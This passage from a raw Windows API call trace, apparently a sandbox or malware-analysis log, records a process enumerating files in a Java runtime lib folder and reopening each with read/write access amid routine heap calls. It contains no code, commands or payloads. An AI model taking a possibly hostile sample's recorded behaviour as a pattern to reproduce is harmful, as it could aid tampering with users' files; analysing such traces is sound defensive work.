lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.522] GetFileType (hFile=0x360) returned 0x1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0097.522] CloseHandle (hObject=0x360) returned 1 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.523] AreFileApisANSI () returned 1 [0097.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x465f8 [0097.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x465f8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 50 [0097.523] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x848c)) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.523] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa76f896, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa76f896, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa76f896, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eb80, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jsse.jar", cAlternateFileName="")) returned 1 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0097.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.524] AreFileApisANSI () returned 1 [0097.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar", lpUsedDefaultChar=0x0) returned 48 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.524] AreFileApisANSI () returned 1 [0097.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0097.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 48 [0097.525] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.525] GetFileType (hFile=0x360) returned 0x1 [0097.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0097.525] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.525] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.525] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.525] CloseHandle (hObject=0x360) returned 1 [0097.526] AreFileApisANSI () returned 1 [0097.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0097.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 48 [0097.526] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.526] GetFileType (hFile=0x360) returned 0x1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0097.526] CloseHandle (hObject=0x360) returned 1 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.527] AreFileApisANSI () returned 1 [0097.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0097.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 48 [0097.527] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa76f896, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa76f896, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa76f896, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eb80)) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.527] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1082, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jvm.hprof.txt", cAlternateFileName="JVMHPR~1.TXT")) returned 1 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0097.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0097.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.528] AreFileApisANSI () returned 1 [0097.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt", lpUsedDefaultChar=0x0) returned 53 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.529] AreFileApisANSI () returned 1 [0097.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0097.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 53 [0097.529] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.529] GetFileType (hFile=0x360) returned 0x1 [0097.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.529] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.529] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.529] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.530] CloseHandle (hObject=0x360) returned 1 [0097.530] AreFileApisANSI () returned 1 [0097.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 